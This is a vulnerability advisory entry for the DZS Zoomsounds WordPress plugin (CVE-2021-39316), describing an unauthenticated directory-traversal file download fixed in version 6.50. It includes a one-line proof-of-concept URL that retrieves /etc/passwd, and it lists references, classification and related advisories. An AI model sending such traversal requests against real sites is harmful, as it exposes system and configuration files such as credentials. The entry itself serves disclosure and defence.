WordPress Plugin Vulnerabilities

DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download

Description

The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the dzsap_download action using directory traversal in the link parameter

Proof of Concept

https://example.com/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd

Affects Plugins

Plugin icon
dzs-zoomsounds
Fixed in 6.50

References

CVE
CVE-2021-39316
Exploitdb
50564
URL
https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316

Classification

Type
FILE DOWNLOAD
OWASP top 10
A1: Injection
CWE
CWE-552
CVSS
7.5 (high)

Miscellaneous

Original Researcher
DigitalJessica Ltd
Verified
Yes
WPVDB ID
d2d60cf7-e4d3-42b6-8dfe-7809f87547bd

Timeline

Publicly Published
2021-08-31 (about 2 years ago)
Added
2021-08-31 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2023-04-19
Title
KIWIZ Invoices Certification & PDF System <= 2.1.3 - Unauthenticated Arbitrary File Download
Published
2019-06-02
Title
Simple File List < 3.2.8 - Unauthenticated Arbitrary File Download
Published
2024-04-03
Title
File Manager < 7.2.6 - Authenticated (Administrator+) Directory Traversal
Published
2021-02-13
Title
Theme Editor < 2.6 - Authenticated Arbitrary File Download
Published
2022-08-01
Title
Lana Downloads Manager < 1.8.0 - Contributor+ Arbitrary File Download